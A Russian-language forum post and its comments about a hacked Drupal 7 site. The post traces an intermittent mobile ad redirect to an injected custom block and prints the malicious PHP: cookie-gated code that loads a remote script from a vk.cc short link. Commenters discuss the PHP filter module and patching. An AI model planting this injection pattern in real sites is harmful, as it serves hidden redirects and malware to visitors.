Вы здесь

Как хакается друпал 7 (давно не обновлял ядро и модули)

При заходе на сайт, НО НЕ ВСЕГДА, а только на мобиле по ссылке из письма после прогруза страница возникал редирект на левый домен с рекламой. При повторном посещении страницы - все ОК. Через несколько дней ситуация повторялась. По первым признакам похоже на скрипт с куки, но несколько дней никак не мог отловить зловреда.

И вот он сегодня возник опять

быстро посмотрел поиск по исходному коду "script" сразу нашел нечто:

<div id="block-block-11" class="block block-block">
   <div class="content">
      <script src="//vk.cc/4gZXXb"></script>  
   </div>
</div>

ага значит, блок!

делаю поиск (хотел уже написать гуглю, но нет) по бэкапу в notepad++ "vk.cc" и находим все это в базе данных в блоке 11

INSERT INTO `block_custom` VALUES ('11','<?php\r\nif (!isset($_COOKIE[''4gZXXb''])) {\r\nsetcookie("4gZXXb", "on", time()+3600);\r\necho ''<script src="//vk.cc/4gZXXb"></script>'';\r\n}\r\n?>','Front Text','views2');

(почему сделал поиск, потому что была вероятность что это код в шаблоне)

собственно идем в блок:

и делаем несколько важных выводов:

  • PHP-filter лучше не использовать
  • ядро все-таки надо обновлять
  • модули все-таки надо обновлять

Остается вопрос: сломали админа и изменили содержимое существующего блока из-под него, или это SQL инъекция? Как-бы это узнать? в dblog записей не нашел, возможно крон уже их потер

UPD
обнаружилось еще такое (нода "о сайте"):

и команда к этой дырке:

айпишник новосибирский (не знаю реальный или нет)

0
7
30.11.2015 - 03:36

Комментарии

Аватар пользователя Петров Николай
Петров Николай – 30.11.2015 - 13:12

точно не помню, но не очень старая, последний раз обновлял осенью или в крайнем случае летом

Аватар пользователя multpix
multpix – 30.11.2015 - 16:02

Этот текст больше подходит для раздела "Вопросы", но никак не "Публикации".

Аватар пользователя Платон Фёдорович
Платон – 30.11.2015 - 22:59

PHP-filter лучше не использовать

Это с малых лет любой Друпал-разработчик должен вбивать себе в голову. Тут скорее «сами виноваты», чем этот громкий заголовок статьи ;) ИМХО, конечно.

Аватар пользователя fidelio
fidelio – 07.12.2015 - 17:40

По поводу модуля PHP-filter несколько вопросов, если позволите:
1. Модуль добавлен в ядро, чтобы его никто не включал? Т.е. модуль есть, но пользоваться им нельзя
2. Вот например решение по рассылке материалов (я им пользуюсь) - http://xandeadx.ru/blog/drupal/681 . Так делать нельзя, да?
3. Если вредоносный скрипт получил права по добавлению блоков (через админку или напрямую в базе данных), почему он не может включить модуль PHP-filter, даже если он был выключен?

Аватар пользователя animan
animan – 17.01.2016 - 02:27

Кстати в 8 его уже нету. Скорее всего его оставили в 7 для тех кто без него не может выполнять задачу по другому. Но хорошо что убрали.

Аватар пользователя Леха Шут
Алекс Шут – 04.12.2015 - 02:18

Да уж.. Жесть конечно, так делать на живом сайте))
теперь не плохо бы проверить все файлы на наличие дописок всяких))